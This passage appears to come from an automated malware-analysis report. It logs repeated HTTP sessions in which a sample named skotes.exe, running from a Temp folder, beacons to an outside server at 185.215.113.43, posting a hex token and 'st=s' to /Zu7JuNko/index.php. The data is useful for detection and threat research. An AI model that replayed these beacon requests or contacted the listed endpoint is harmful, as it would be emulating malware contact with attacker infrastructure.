Nov 10, 2024 04:58:08.952620029 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	50299	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:10.470664024 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:58:11.376094103 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	50300	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:13.016752958 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:58:13.930449963 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	50301	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:15.450989008 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:58:16.357055902 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	50302	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:17.992310047 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:58:18.898372889 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	50305	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:20.432324886 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:58:21.347615957 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	50307	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:22.986701012 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:58:23.901968002 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	50308	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:25.415307045 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:58:26.329709053 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	50309	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:27.956571102 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:58:28.859203100 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	50311	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:30.376709938 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:58:31.290592909 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	50312	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:32.955859900 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:58:33.868505955 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	50313	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:35.396502018 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:58:36.304301023 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	50315	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:37.940778017 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:58:38.856064081 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	50316	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:40.380420923 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:58:41.287708998 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	50317	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:42.923397064 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:58:43.820642948 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	50318	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:45.346054077 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	50319	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:46.972212076 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:58:47.877064943 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	50321	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:49.392189026 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:58:50.304197073 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	50322	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:51.953824997 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:58:52.854687929 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	50323	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:54.364732981 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:58:55.287740946 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	50324	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:56.923546076 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:58:57.826850891 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:58:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	50326	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:58:59.349083900 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:59:00.278465986 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	50329	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:01.907301903 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:59:02.815191031 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	50330	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:59:04.328526020 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:59:05.230823994 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:59:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
